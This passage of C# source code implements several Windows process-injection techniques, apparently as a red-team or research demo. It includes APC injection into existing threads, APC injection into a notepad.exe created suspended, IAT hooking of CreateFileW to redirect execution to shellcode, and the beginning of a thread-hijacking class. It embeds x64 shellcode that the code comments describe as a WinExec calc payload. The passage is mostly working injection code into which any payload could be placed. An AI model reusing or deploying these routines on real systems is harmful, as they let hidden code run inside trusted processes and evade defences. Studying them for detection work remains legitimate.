IntPtr procHandle = OpenProcess(PROCESS_VM_OPERATION | PROCESS_VM_WRITE | PROCESS_VM_READ, false, targetProcess.Id);
// Allocate memory within process and write shellcode
IntPtr resultPtr = VirtualAllocEx(procHandle, IntPtr.Zero, shellcode.Length,MEM_COMMIT, PAGE_EXECUTE_READWRITE);
IntPtr bytesWritten = IntPtr.Zero;
bool resultBool = WriteProcessMemory(procHandle,resultPtr,shellcode,shellcode.Length, out bytesWritten);
// Modify memory permissions on shellcode from XRW to XR
uint oldProtect = 0;
resultBool = VirtualProtectEx(procHandle, resultPtr, shellcode.Length, PAGE_EXECUTE_READ, out oldProtect);
// Iterate over threads and queueapc
foreach (ProcessThread thread in targetProcess.Threads)
{
//Get handle to thread
IntPtr tHandle = OpenThread(ThreadAccess.THREAD_HIJACK, false, (int)thread.Id);
//Assign APC to thread to execute shellcode
IntPtr ptr = QueueUserAPC(resultPtr, tHandle, IntPtr.Zero);
}
}
// Memory permissions
private static UInt32 MEM_COMMIT = 0x1000;
private static UInt32 PAGE_EXECUTE_READWRITE = 0x40;
//private static UInt32 PAGE_READWRITE = 0x04;
private static UInt32 PAGE_EXECUTE_READ = 0x20;
// Process privileges
const int PROCESS_CREATE_THREAD = 0x0002;
const int PROCESS_QUERY_INFORMATION = 0x0400;
const int PROCESS_VM_OPERATION = 0x0008;
const int PROCESS_VM_WRITE = 0x0020;
const int PROCESS_VM_READ = 0x0010;
[Flags]
public enum ThreadAccess : int
{
TERMINATE = (0x0001),
SUSPEND_RESUME = (0x0002),
GET_CONTEXT = (0x0008),
SET_CONTEXT = (0x0010),
SET_INFORMATION = (0x0020),
QUERY_INFORMATION = (0x0040),
SET_THREAD_TOKEN = (0x0080),
IMPERSONATE = (0x0100),
DIRECT_IMPERSONATION = (0x0200),
THREAD_HIJACK = SUSPEND_RESUME | GET_CONTEXT | SET_CONTEXT,
THREAD_ALL = TERMINATE | SUSPEND_RESUME | GET_CONTEXT | SET_CONTEXT | SET_INFORMATION | QUERY_INFORMATION | SET_THREAD_TOKEN | IMPERSONATE | DIRECT_IMPERSONATION
}
[DllImport("kernel32.dll", SetLastError = true)]
public static extern IntPtr OpenThread(ThreadAccess dwDesiredAccess, bool bInheritHandle,
int dwThreadId);
[DllImport("kernel32.dll",SetLastError = true)]
public static extern bool WriteProcessMemory(IntPtr hProcess, IntPtr lpBaseAddress, byte[] lpBuffer, int nSize, out IntPtr lpNumberOfBytesWritten);
[DllImport("kernel32.dll")]
public static extern IntPtr QueueUserAPC(IntPtr pfnAPC, IntPtr hThread, IntPtr dwData);
[DllImport("kernel32")]
public static extern IntPtr VirtualAlloc(UInt32 lpStartAddr,
Int32 size, UInt32 flAllocationType, UInt32 flProtect);
[DllImport("kernel32.dll", SetLastError = true )]
public static extern IntPtr VirtualAllocEx(IntPtr hProcess, IntPtr lpAddress,
Int32 dwSize, UInt32 flAllocationType, UInt32 flProtect);
[DllImport("kernel32.dll", SetLastError = true)]
public static extern IntPtr OpenProcess(int dwDesiredAccess, bool bInheritHandle, int dwProcessId);
[DllImport("kernel32.dll")]
public static extern bool VirtualProtectEx(IntPtr hProcess, IntPtr lpAddress,
int dwSize, uint flNewProtect, out uint lpflOldProtect);
}
public class ApcInjectionNewProcess
{
public static void Inject()
{
byte[] shellcode = new byte[112] {
0x50,0x51,0x52,0x53,0x56,0x57,0x55,0x54,0x58,0x66,0x83,0xe4,0xf0,0x50,0x6a,0x60,0x5a,0x68,0x63,0x61,0x6c,0x63,0x54,0x59,0x48,0x29,0xd4,0x65,0x48,0x8b,0x32,0x48,0x8b,0x76,0x18,0x48,0x8b,0x76,0x10,0x48,0xad,0x48,0x8b,0x30,0x48,0x8b,0x7e,0x30,0x03,0x57,0x3c,0x8b,0x5c,0x17,0x28,0x8b,0x74,0x1f,0x20,0x48,0x01,0xfe,0x8b,0x54,0x1f,0x24,0x0f,0xb7,0x2c,0x17,0x8d,0x52,0x02,0xad,0x81,0x3c,0x07,0x57,0x69,0x6e,0x45,0x75,0xef,0x8b,0x74,0x1f,0x1c,0x48,0x01,0xfe,0x8b,0x34,0xae,0x48,0x01,0xf7,0x99,0xff,0xd7,0x48,0x83,0xc4,0x68,0x5c,0x5d,0x5f,0x5e,0x5b,0x5a,0x59,0x58,0xc3
};
// Target process to inject into
string processpath = @"C:\Windows\notepad.exe";
STARTUPINFO si = new STARTUPINFO();
PROCESS_INFORMATION pi = new PROCESS_INFORMATION();
// Create new process in suspended state to inject into
bool success = CreateProcess(processpath, null,
IntPtr.Zero, IntPtr.Zero, false,
ProcessCreationFlags.CREATE_SUSPENDED,
IntPtr.Zero, null, ref si, out pi);
// Allocate memory within process and write shellcode
IntPtr resultPtr = VirtualAllocEx(pi.hProcess, IntPtr.Zero, shellcode.Length,MEM_COMMIT, PAGE_READWRITE);
IntPtr bytesWritten = IntPtr.Zero;
bool resultBool = WriteProcessMemory(pi.hProcess,resultPtr,shellcode,shellcode.Length, out bytesWritten);
// Open thread
IntPtr sht = OpenThread(ThreadAccess.SET_CONTEXT, false, (int)pi.dwThreadId);
uint oldProtect = 0;
// Modify memory permissions on allocated shellcode
resultBool = VirtualProtectEx(pi.hProcess,resultPtr, shellcode.Length,PAGE_EXECUTE_READ, out oldProtect);
// Assign address of shellcode to the target thread apc queue
IntPtr ptr = QueueUserAPC(resultPtr,sht,IntPtr.Zero);
IntPtr ThreadHandle = pi.hThread;
ResumeThread(ThreadHandle);
}
private static UInt32 MEM_COMMIT = 0x1000;
//private static UInt32 PAGE_EXECUTE_READWRITE = 0x40; //I'm not using this #DFIR ;-)
private static UInt32 PAGE_READWRITE = 0x04;
private static UInt32 PAGE_EXECUTE_READ = 0x20;
[Flags]
public enum ProcessAccessFlags : uint
{
All = 0x001F0FFF,
Terminate = 0x00000001,
CreateThread = 0x00000002,
VirtualMemoryOperation = 0x00000008,
VirtualMemoryRead = 0x00000010,
VirtualMemoryWrite = 0x00000020,
DuplicateHandle = 0x00000040,
CreateProcess = 0x000000080,
SetQuota = 0x00000100,
SetInformation = 0x00000200,
QueryInformation = 0x00000400,
QueryLimitedInformation = 0x00001000,
Synchronize = 0x00100000
}
[Flags]
public enum ProcessCreationFlags : uint
{
ZERO_FLAG = 0x00000000,
CREATE_BREAKAWAY_FROM_JOB = 0x01000000,
CREATE_DEFAULT_ERROR_MODE = 0x04000000,
CREATE_NEW_CONSOLE = 0x00000010,
CREATE_NEW_PROCESS_GROUP = 0x00000200,
CREATE_NO_WINDOW = 0x08000000,
CREATE_PROTECTED_PROCESS = 0x00040000,
CREATE_PRESERVE_CODE_AUTHZ_LEVEL = 0x02000000,
CREATE_SEPARATE_WOW_VDM = 0x00001000,
CREATE_SHARED_WOW_VDM = 0x00001000,
CREATE_SUSPENDED = 0x00000004,
CREATE_UNICODE_ENVIRONMENT = 0x00000400,
DEBUG_ONLY_THIS_PROCESS = 0x00000002,
DEBUG_PROCESS = 0x00000001,
DETACHED_PROCESS = 0x00000008,
EXTENDED_STARTUPINFO_PRESENT = 0x00080000,
INHERIT_PARENT_AFFINITY = 0x00010000
}
public struct PROCESS_INFORMATION
{
public IntPtr hProcess;
public IntPtr hThread;
public uint dwProcessId;
public uint dwThreadId;
}
public struct STARTUPINFO
{
public uint cb;
public string lpReserved;
public string lpDesktop;
public string lpTitle;
public uint dwX;
public uint dwY;
public uint dwXSize;
public uint dwYSize;
public uint dwXCountChars;
public uint dwYCountChars;
public uint dwFillAttribute;
public uint dwFlags;
public short wShowWindow;
public short cbReserved2;
public IntPtr lpReserved2;
public IntPtr hStdInput;
public IntPtr hStdOutput;
public IntPtr hStdError;
}
[Flags]
public enum ThreadAccess : int
{
TERMINATE = (0x0001) ,
SUSPEND_RESUME = (0x0002) ,
GET_CONTEXT = (0x0008) ,
SET_CONTEXT = (0x0010) ,
SET_INFORMATION = (0x0020) ,
QUERY_INFORMATION = (0x0040) ,
SET_THREAD_TOKEN = (0x0080) ,
IMPERSONATE = (0x0100) ,
DIRECT_IMPERSONATION = (0x0200)
}
[DllImport("kernel32.dll", SetLastError = true)]
public static extern IntPtr OpenThread(ThreadAccess dwDesiredAccess, bool bInheritHandle,
int dwThreadId);
[DllImport("kernel32.dll",SetLastError = true)]
public static extern bool WriteProcessMemory(
IntPtr hProcess,
IntPtr lpBaseAddress,
byte[] lpBuffer,
int nSize,
out IntPtr lpNumberOfBytesWritten);
[DllImport("kernel32.dll")]
public static extern IntPtr QueueUserAPC(IntPtr pfnAPC, IntPtr hThread, IntPtr dwData);
[DllImport("kernel32")]
public static extern IntPtr VirtualAlloc(UInt32 lpStartAddr,
Int32 size, UInt32 flAllocationType, UInt32 flProtect);
[DllImport("kernel32.dll", SetLastError = true )]
public static extern IntPtr VirtualAllocEx(IntPtr hProcess, IntPtr lpAddress,
Int32 dwSize, UInt32 flAllocationType, UInt32 flProtect);
[DllImport("kernel32.dll", SetLastError = true)]
public static extern IntPtr OpenProcess(
ProcessAccessFlags processAccess,
bool bInheritHandle,
int processId
);
[DllImport("kernel32.dll")]
public static extern bool CreateProcess(string lpApplicationName, string lpCommandLine, IntPtr lpProcessAttributes, IntPtr lpThreadAttributes,bool bInheritHandles, ProcessCreationFlags dwCreationFlags, IntPtr lpEnvironment,string lpCurrentDirectory, ref STARTUPINFO lpStartupInfo, out PROCESS_INFORMATION lpProcessInformation);
[DllImport("kernel32.dll")]
public static extern uint ResumeThread(IntPtr hThread);
[DllImport("kernel32.dll")]
public static extern uint SuspendThread(IntPtr hThread);
[DllImport("kernel32.dll")]
public static extern bool VirtualProtectEx(IntPtr hProcess, IntPtr lpAddress,
int dwSize, uint flNewProtect, out uint lpflOldProtect);
}
public class IatInjection
{
public static void Inject()
{
string targetProcName = "notepad";
string targetFuncName = "CreateFileW";
// Get target process id and read memory contents
Process process = Process.GetProcessesByName(targetProcName)[0];
IntPtr hProcess = OpenProcess(PROCESS_ALL_ACCESS, false, process.Id);
int bytesRead = 0;
byte[] fileBytes = new byte[process.WorkingSet64];
ReadProcessMemory(hProcess, process.MainModule.BaseAddress, fileBytes, fileBytes.Length, ref bytesRead);
// The DOS header
IMAGE_DOS_HEADER dosHeader;
// The file header
IMAGE_FILE_HEADER fileHeader;
// Optional 32 bit file header
IMAGE_OPTIONAL_HEADER32 optionalHeader32 = new IMAGE_OPTIONAL_HEADER32();
// Optional 64 bit file header
IMAGE_OPTIONAL_HEADER64 optionalHeader64 = new IMAGE_OPTIONAL_HEADER64();
// Image Section headers
IMAGE_SECTION_HEADER[] imageSectionHeaders;
// Import descriptor for each DLL
IMAGE_IMPORT_DESCRIPTOR[] importDescriptors;
// Convert file bytes to memorystream and use reader
MemoryStream stream = new MemoryStream(fileBytes, 0, fileBytes.Length);
BinaryReader reader = new BinaryReader(stream);
//Begin parsing structures
dosHeader = FromBinaryReader<IMAGE_DOS_HEADER>(reader);
// Add 4 bytes to the offset
stream.Seek(dosHeader.e_lfanew, SeekOrigin.Begin);
UInt32 ntHeadersSignature = reader.ReadUInt32();
fileHeader = FromBinaryReader<IMAGE_FILE_HEADER>(reader);
if (Is32BitHeader(fileHeader))
{
optionalHeader32 = FromBinaryReader<IMAGE_OPTIONAL_HEADER32>(reader);
}
else
{
optionalHeader64 = FromBinaryReader<IMAGE_OPTIONAL_HEADER64>(reader);
}
imageSectionHeaders = new IMAGE_SECTION_HEADER[fileHeader.NumberOfSections];
for (int headerNo = 0; headerNo < imageSectionHeaders.Length; ++headerNo)
{
imageSectionHeaders[headerNo] = FromBinaryReader<IMAGE_SECTION_HEADER>(reader);
}
// Go to ImportTable and parse every imported DLL
stream.Seek((long)((ulong)optionalHeader64.ImportTable.VirtualAddress), SeekOrigin.Begin);
importDescriptors = new IMAGE_IMPORT_DESCRIPTOR[50];
for (int i = 0; i < 50; i++)
{
importDescriptors[i] = FromBinaryReader<IMAGE_IMPORT_DESCRIPTOR>(reader);
}
bool flag = false;
int j = 0;
// The below is really hacky, would have been better to use structures!
while (j < importDescriptors.Length && !flag)
{
for (int k = 0; k < 1000; k++)
{
// Get the address for the function and its name
stream.Seek(importDescriptors[j].OriginalFirstThunk + (k * 8), SeekOrigin.Begin);
long nameOffset = reader.ReadInt64();
if (nameOffset > 1000000 || nameOffset < 0)
{
break;
}
// Get the function name
stream.Seek(nameOffset + 2, SeekOrigin.Begin);
List<string> list = new List<string>();
byte[] array;
do
{
array = reader.ReadBytes(1);
list.Add(Encoding.Default.GetString(array));
}
while (array[0] != 0);
string curFuncName = string.Join(string.Empty, list.ToArray());
curFuncName = curFuncName.Substring(0, curFuncName.Length - 1);
// Get the offset of the pointer to the target function and its current value
long funcOffset = importDescriptors[j].FirstThunk + (k * 8);
stream.Seek(funcOffset, SeekOrigin.Begin);
long curFuncAddr = reader.ReadInt64();
// Found target function, modify address to point to shellcode
if (curFuncName == targetFuncName)
{
// WinExec shellcode from: https://github.com/peterferrie/win-exec-calc-shellcode
// nasm w64-exec-calc-shellcode.asm -DSTACK_ALIGN=TRUE -DFUNC=TRUE -DCLEAN=TRUE -o w64-exec-calc-shellcode.bin
byte[] payload = new byte[111] {
0x50,0x51,0x52,0x53,0x56,0x57,0x55,0x54,0x58,0x66,0x83,0xe4,0xf0,0x50,0x6a,0x60,0x5a,0x68,0x63,0x61,0x6c,0x63,0x54,0x59,0x48,0x29,0xd4,0x65,0x48,0x8b,0x32,0x48,0x8b,0x76,0x18,0x48,0x8b,0x76,0x10,0x48,0xad,0x48,0x8b,0x30,0x48,0x8b,0x7e,0x30,0x03,0x57,0x3c,0x8b,0x5c,0x17,0x28,0x8b,0x74,0x1f,0x20,0x48,0x01,0xfe,0x8b,0x54,0x1f,0x24,0x0f,0xb7,0x2c,0x17,0x8d,0x52,0x02,0xad,0x81,0x3c,0x07,0x57,0x69,0x6e,0x45,0x75,0xef,0x8b,0x74,0x1f,0x1c,0x48,0x01,0xfe,0x8b,0x34,0xae,0x48,0x01,0xf7,0x99,0xff,0xd7,0x48,0x83,0xc4,0x68,0x5c,0x5d,0x5f,0x5e,0x5b,0x5a,0x59,0x58
};
// Once shellcode has executed go to real import (mov to rax then jmp to address)
byte[] mov_rax = new byte[2] {
0x48, 0xb8
};
byte[] jmp_address = BitConverter.GetBytes(curFuncAddr);
byte[] jmp_rax = new byte[2] {
0xff, 0xe0
};
// Build shellcode
byte[] shellcode = new byte[payload.Length + mov_rax.Length + jmp_address.Length + jmp_rax.Length];
payload.CopyTo(shellcode, 0);
mov_rax.CopyTo(shellcode, payload.Length);
jmp_address.CopyTo(shellcode, payload.Length+mov_rax.Length);
jmp_rax.CopyTo(shellcode, payload.Length+mov_rax.Length+jmp_address.Length);
// Allocate memory for shellcode
IntPtr shellcodeAddress = VirtualAllocEx(hProcess, IntPtr.Zero, shellcode.Length,MEM_COMMIT, PAGE_EXECUTE_READWRITE);
// Write shellcode to memory
IntPtr shellcodeBytesWritten = IntPtr.Zero;
WriteProcessMemory(hProcess,shellcodeAddress,shellcode,shellcode.Length, out shellcodeBytesWritten);
long funcAddress = (long)optionalHeader64.ImageBase + funcOffset;
// Get current value of IAT
bytesRead = 0;
byte[] buffer1 = new byte[8];
ReadProcessMemory(hProcess, (IntPtr)funcAddress, buffer1, buffer1.Length, ref bytesRead);
// Get shellcode address
byte[] shellcodePtr = BitConverter.GetBytes((Int64)shellcodeAddress);
// Modify permissions to allow IAT modification
uint oldProtect = 0;
bool protectbool = VirtualProtectEx(hProcess, (IntPtr)funcAddress, shellcodePtr.Length, PAGE_EXECUTE_READWRITE, out oldProtect);
// Modfiy IAT to point to shellcode
IntPtr iatBytesWritten = IntPtr.Zero;
bool success = WriteProcessMemory(hProcess, (IntPtr)funcAddress, shellcodePtr, shellcodePtr.Length, out iatBytesWritten);
// Read IAT to confirm new value
bytesRead = 0;
byte[] buffer = new byte[8];
ReadProcessMemory(hProcess, (IntPtr)funcAddress, buffer, buffer.Length, ref bytesRead);
flag = true;
break;
}
}
j++;
}
}
public struct IMAGE_DOS_HEADER
{ // DOS .EXE header
public UInt16 e_magic; // Magic number
public UInt16 e_cblp; // Bytes on last page of file
public UInt16 e_cp; // Pages in file
public UInt16 e_crlc; // Relocations
public UInt16 e_cparhdr; // Size of header in paragraphs
public UInt16 e_minalloc; // Minimum extra paragraphs needed
public UInt16 e_maxalloc; // Maximum extra paragraphs needed
public UInt16 e_ss; // Initial (relative) SS value
public UInt16 e_sp; // Initial SP value
public UInt16 e_csum; // Checksum
public UInt16 e_ip; // Initial IP value
public UInt16 e_cs; // Initial (relative) CS value
public UInt16 e_lfarlc; // File address of relocation table
public UInt16 e_ovno; // Overlay number
public UInt16 e_res_0; // Reserved words
public UInt16 e_res_1; // Reserved words
public UInt16 e_res_2; // Reserved words
public UInt16 e_res_3; // Reserved words
public UInt16 e_oemid; // OEM identifier (for e_oeminfo)
public UInt16 e_oeminfo; // OEM information; e_oemid specific
public UInt16 e_res2_0; // Reserved words
public UInt16 e_res2_1; // Reserved words
public UInt16 e_res2_2; // Reserved words
public UInt16 e_res2_3; // Reserved words
public UInt16 e_res2_4; // Reserved words
public UInt16 e_res2_5; // Reserved words
public UInt16 e_res2_6; // Reserved words
public UInt16 e_res2_7; // Reserved words
public UInt16 e_res2_8; // Reserved words
public UInt16 e_res2_9; // Reserved words
public UInt32 e_lfanew; // File address of new exe header
}
[StructLayout(LayoutKind.Sequential)]
public struct IMAGE_DATA_DIRECTORY
{
public UInt32 VirtualAddress;
public UInt32 Size;
}
[StructLayout(LayoutKind.Sequential, Pack = 1)]
public struct IMAGE_OPTIONAL_HEADER32
{
public UInt16 Magic;
public Byte MajorLinkerVersion;
public Byte MinorLinkerVersion;
public UInt32 SizeOfCode;
public UInt32 SizeOfInitializedData;
public UInt32 SizeOfUninitializedData;
public UInt32 AddressOfEntryPoint;
public UInt32 BaseOfCode;
public UInt32 BaseOfData;
public UInt32 ImageBase;
public UInt32 SectionAlignment;
public UInt32 FileAlignment;
public UInt16 MajorOperatingSystemVersion;
public UInt16 MinorOperatingSystemVersion;
public UInt16 MajorImageVersion;
public UInt16 MinorImageVersion;
public UInt16 MajorSubsystemVersion;
public UInt16 MinorSubsystemVersion;
public UInt32 Win32VersionValue;
public UInt32 SizeOfImage;
public UInt32 SizeOfHeaders;
public UInt32 CheckSum;
public UInt16 Subsystem;
public UInt16 DllCharacteristics;
public UInt32 SizeOfStackReserve;
public UInt32 SizeOfStackCommit;
public UInt32 SizeOfHeapReserve;
public UInt32 SizeOfHeapCommit;
public UInt32 LoaderFlags;
public UInt32 NumberOfRvaAndSizes;
public IMAGE_DATA_DIRECTORY ExportTable;
public IMAGE_DATA_DIRECTORY ImportTable;
public IMAGE_DATA_DIRECTORY ResourceTable;
public IMAGE_DATA_DIRECTORY ExceptionTable;
public IMAGE_DATA_DIRECTORY CertificateTable;
public IMAGE_DATA_DIRECTORY BaseRelocationTable;
public IMAGE_DATA_DIRECTORY Debug;
public IMAGE_DATA_DIRECTORY Architecture;
public IMAGE_DATA_DIRECTORY GlobalPtr;
public IMAGE_DATA_DIRECTORY TLSTable;
public IMAGE_DATA_DIRECTORY LoadConfigTable;
public IMAGE_DATA_DIRECTORY BoundImport;
public IMAGE_DATA_DIRECTORY IAT;
public IMAGE_DATA_DIRECTORY DelayImportDescriptor;
public IMAGE_DATA_DIRECTORY CLRRuntimeHeader;
public IMAGE_DATA_DIRECTORY Reserved;
}
[StructLayout(LayoutKind.Sequential, Pack = 1)]
public struct IMAGE_OPTIONAL_HEADER64
{
public UInt16 Magic;
public Byte MajorLinkerVersion;
public Byte MinorLinkerVersion;
public UInt32 SizeOfCode;
public UInt32 SizeOfInitializedData;
public UInt32 SizeOfUninitializedData;
public UInt32 AddressOfEntryPoint;
public UInt32 BaseOfCode;
public UInt64 ImageBase;
public UInt32 SectionAlignment;
public UInt32 FileAlignment;
public UInt16 MajorOperatingSystemVersion;
public UInt16 MinorOperatingSystemVersion;
public UInt16 MajorImageVersion;
public UInt16 MinorImageVersion;
public UInt16 MajorSubsystemVersion;
public UInt16 MinorSubsystemVersion;
public UInt32 Win32VersionValue;
public UInt32 SizeOfImage;
public UInt32 SizeOfHeaders;
public UInt32 CheckSum;
public UInt16 Subsystem;
public UInt16 DllCharacteristics;
public UInt64 SizeOfStackReserve;
public UInt64 SizeOfStackCommit;
public UInt64 SizeOfHeapReserve;
public UInt64 SizeOfHeapCommit;
public UInt32 LoaderFlags;
public UInt32 NumberOfRvaAndSizes;
public IMAGE_DATA_DIRECTORY ExportTable;
public IMAGE_DATA_DIRECTORY ImportTable;
public IMAGE_DATA_DIRECTORY ResourceTable;
public IMAGE_DATA_DIRECTORY ExceptionTable;
public IMAGE_DATA_DIRECTORY CertificateTable;
public IMAGE_DATA_DIRECTORY BaseRelocationTable;
public IMAGE_DATA_DIRECTORY Debug;
public IMAGE_DATA_DIRECTORY Architecture;
public IMAGE_DATA_DIRECTORY GlobalPtr;
public IMAGE_DATA_DIRECTORY TLSTable;
public IMAGE_DATA_DIRECTORY LoadConfigTable;
public IMAGE_DATA_DIRECTORY BoundImport;
public IMAGE_DATA_DIRECTORY IAT;
public IMAGE_DATA_DIRECTORY DelayImportDescriptor;
public IMAGE_DATA_DIRECTORY CLRRuntimeHeader;
public IMAGE_DATA_DIRECTORY Reserved;
}
[StructLayout(LayoutKind.Sequential, Pack = 1)]
public struct IMAGE_FILE_HEADER
{
public UInt16 Machine;
public UInt16 NumberOfSections;
public UInt32 TimeDateStamp;
public UInt32 PointerToSymbolTable;
public UInt32 NumberOfSymbols;
public UInt16 SizeOfOptionalHeader;
public UInt16 Characteristics;
}
[StructLayout(LayoutKind.Explicit)]
public struct IMAGE_SECTION_HEADER
{
[FieldOffset(0)]
[MarshalAs(UnmanagedType.ByValArray, SizeConst = 8)]
public char[] Name;
[FieldOffset(8)]
public UInt32 VirtualSize;
[FieldOffset(12)]
public UInt32 VirtualAddress;
[FieldOffset(16)]
public UInt32 SizeOfRawData;
[FieldOffset(20)]
public UInt32 PointerToRawData;
[FieldOffset(24)]
public UInt32 PointerToRelocations;
[FieldOffset(28)]
public UInt32 PointerToLinenumbers;
[FieldOffset(32)]
public UInt16 NumberOfRelocations;
[FieldOffset(34)]
public UInt16 NumberOfLinenumbers;
[FieldOffset(36)]
public DataSectionFlags Characteristics;
public string Section
{
get { return new string(Name); }
}
}
[StructLayout(LayoutKind.Sequential)]
public struct IMAGE_IMPORT_DESCRIPTOR
{
public uint OriginalFirstThunk;
public uint TimeDateStamp;
public uint ForwarderChain;
public uint Name;
public uint FirstThunk;
}
[StructLayout(LayoutKind.Sequential)]
public struct IMAGE_BASE_RELOCATION
{
public uint VirtualAdress;
public uint SizeOfBlock;
}
[Flags]
public enum DataSectionFlags : uint
{
Stub = 0x00000000,
}
public static T FromBinaryReader<T>(BinaryReader reader)
{
// Read in a byte array
byte[] bytes = reader.ReadBytes(Marshal.SizeOf(typeof(T)));
// Pin the managed memory while, copy it out the data, then unpin it
GCHandle handle = GCHandle.Alloc(bytes, GCHandleType.Pinned);
T theStructure = (T)Marshal.PtrToStructure(handle.AddrOfPinnedObject(), typeof(T));
handle.Free();
return theStructure;
}
public static bool Is32BitHeader(IMAGE_FILE_HEADER fileHeader)
{
UInt16 IMAGE_FILE_32BIT_MACHINE = 0x0100;
return (IMAGE_FILE_32BIT_MACHINE & fileHeader.Characteristics) == IMAGE_FILE_32BIT_MACHINE;
}
// Process privileges
public const int PROCESS_CREATE_THREAD = 0x0002;
public const int PROCESS_QUERY_INFORMATION = 0x0400;
public const int PROCESS_VM_OPERATION = 0x0008;
public const int PROCESS_VM_WRITE = 0x0020;
public const int PROCESS_VM_READ = 0x0010;
public const int PROCESS_ALL_ACCESS = PROCESS_CREATE_THREAD | PROCESS_QUERY_INFORMATION | PROCESS_VM_OPERATION | PROCESS_VM_WRITE | PROCESS_VM_READ;
// Memory permissions
public const uint MEM_COMMIT = 0x00001000;
public const uint MEM_RESERVE = 0x00002000;
public const uint PAGE_READWRITE = 0x04;
public const uint PAGE_EXECUTE_READWRITE = 0x40;
[DllImport("kernel32.dll")]
public static extern IntPtr OpenProcess(int dwDesiredAccess, bool bInheritHandle, int dwProcessId);
[DllImport("kernel32.dll")]
public static extern IntPtr VirtualAllocEx(IntPtr hProcess, IntPtr lpAddress, int dwSize, uint flAllocationType, uint flProtect);
[DllImport("kernel32.dll")]
public static extern bool VirtualProtectEx(IntPtr hProcess, IntPtr lpAddress, int dwSize, uint flNewProtect, out uint lpflOldProtect);
[DllImport("kernel32.dll")]
public static extern bool WriteProcessMemory(IntPtr hProcess, IntPtr lpBaseAddress, byte[] lpBuffer, int nSize, out IntPtr lpNumberOfBytesWritten);
[DllImport("kernel32.dll")]
public static extern bool ReadProcessMemory(IntPtr hProcess, IntPtr lpBaseAddress, byte[] lpBuffer, int dwSize, ref int lpNumberOfBytesRead);
[DllImport("kernel32.dll", SetLastError = true, CharSet = CharSet.Unicode)]
public static extern IntPtr LoadLibrary(string lpFileName);
[DllImport("kernel32.dll", CharSet = CharSet.Ansi, ExactSpelling = true, SetLastError = true)]
public static extern IntPtr GetProcAddress(IntPtr hModule, string procName);
}
public class ThreadHijack
{
// Import API Functions
[DllImport("kernel32.dll")]
public static extern IntPtr OpenProcess(int dwDesiredAccess, bool bInheritHandle, int dwProcessId);
[DllImport("kernel32.dll")]
static extern IntPtr OpenThread(ThreadAccess dwDesiredAccess, bool bInheritHandle, uint dwThreadId);
[DllImport("kernel32.dll")]
static extern uint SuspendThread(IntPtr hThread);
[DllImport("kernel32.dll", SetLastError = true)]
static extern bool GetThreadContext(IntPtr hThread, ref CONTEXT64 lpContext);
[DllImport("kernel32.dll", SetLastError = true)]
static extern bool SetThreadContext(IntPtr hThread, ref CONTEXT64 lpContext);
[DllImport("kernel32.dll")]
static extern int ResumeThread(IntPtr hThread);
[DllImport("kernel32", CharSet = CharSet.Auto,SetLastError = true)]
static extern bool CloseHandle(IntPtr handle);
[DllImport("kernel32", CharSet = CharSet.Ansi, ExactSpelling = true, SetLastError = true)]
static extern IntPtr GetProcAddress(IntPtr hModule, string procName);
[DllImport("kernel32.dll", SetLastError = true, ExactSpelling = true)]
static extern IntPtr VirtualAllocEx(IntPtr hProcess, IntPtr lpAddress,uint dwSize, uint flAllocationType, uint flProtect);
[DllImport("kernel32.dll", SetLastError = true)]
static extern bool WriteProcessMemory(IntPtr hProcess, IntPtr lpBaseAddress, byte[] lpBuffer, uint nSize, out UIntPtr lpNumberOfBytesWritten);
[DllImport("kernel32.dll")]
static extern bool ReadProcessMemory(IntPtr hProcess, IntPtr lpBaseAddress, byte[] lpBuffer, int dwSize, ref int lpNumberOfBytesRead);
// Process privileges
const int PROCESS_CREATE_THREAD = 0x0002;
const int PROCESS_QUERY_INFORMATION = 0x0400;
const int PROCESS_VM_OPERATION = 0x0008;
const int PROCESS_VM_WRITE = 0x0020;
const int PROCESS_VM_READ = 0x0010;
// Memory permissions
const uint MEM_COMMIT = 0x00001000;
const uint MEM_RESERVE = 0x00002000;
const uint PAGE_READWRITE = 4;
const uint PAGE_EXECUTE_READWRITE = 0x40;
[Flags]
public enum ThreadAccess : int
{
TERMINATE = (0x0001),
SUSPEND_RESUME = (0x0002),
GET_CONTEXT = (0x0008),
SET_CONTEXT = (0x0010),
SET_INFORMATION = (0x0020),
QUERY_INFORMATION = (0x0040),
SET_THREAD_TOKEN = (0x0080),
IMPERSONATE = (0x0100),
DIRECT_IMPERSONATION = (0x0200),
THREAD_HIJACK = SUSPEND_RESUME | GET_CONTEXT | SET_CONTEXT,
THREAD_ALL = TERMINATE | SUSPEND_RESUME | GET_CONTEXT | SET_CONTEXT | SET_INFORMATION | QUERY_INFORMATION | SET_THREAD_TOKEN | IMPERSONATE | DIRECT_IMPERSONATION
}
public enum CONTEXT_FLAGS : uint
{
CONTEXT_i386 = 0x10000,
CONTEXT_i486 = 0x10000, // same as i386
CONTEXT_CONTROL = CONTEXT_i386 | 0x01, // SS:SP, CS:IP, FLAGS, BP
CONTEXT_INTEGER = CONTEXT_i386 | 0x02, // AX, BX, CX, DX, SI, DI
CONTEXT_SEGMENTS = CONTEXT_i386 | 0x04, // DS, ES, FS, GS
CONTEXT_FLOATING_POINT = CONTEXT_i386 | 0x08, // 387 state
CONTEXT_DEBUG_REGISTERS = CONTEXT_i386 | 0x10, // DB 0-3,6,7
CONTEXT_EXTENDED_REGISTERS = CONTEXT_i386 | 0x20, // cpu specific extensions
CONTEXT_FULL = CONTEXT_CONTROL | CONTEXT_INTEGER | CONTEXT_SEGMENTS,
CONTEXT_ALL = CONTEXT_CONTROL | CONTEXT_INTEGER | CONTEXT_SEGMENTS | CONTEXT_FLOATING_POINT | CONTEXT_DEBUG_REGISTERS | CONTEXT_EXTENDED_REGISTERS
}
// x86 float save
[StructLayout(LayoutKind.Sequential)]
public struct FLOATING_SAVE_AREA
{
public uint ControlWord;
public uint StatusWord;
public uint TagWord;
public uint ErrorOffset;
public uint ErrorSelector;
public uint DataOffset;
public uint DataSelector;
[MarshalAs(UnmanagedType.ByValArray, SizeConst = 80)]
public byte[] RegisterArea;
public uint Cr0NpxState;
}
// x86 context structure (not used in this example)
[StructLayout(LayoutKind.Sequential)]
public struct CONTEXT
{
public uint ContextFlags; //set this to an appropriate value
// Retrieved by CONTEXT_DEBUG_REGISTERS
public uint Dr0;
public uint Dr1;
public uint Dr2;
public uint Dr3;
public uint Dr6;
public uint Dr7;
// Retrieved by CONTEXT_FLOATING_POINT
public FLOATING_SAVE_AREA FloatSave;
// Retrieved by CONTEXT_SEGMENTS
public uint SegGs;
public uint SegFs;
public uint SegEs;
public uint SegDs;
// Retrieved by CONTEXT_INTEGER
public uint Edi;
public uint Esi;
public uint Ebx;
public uint Edx;
public uint Ecx;
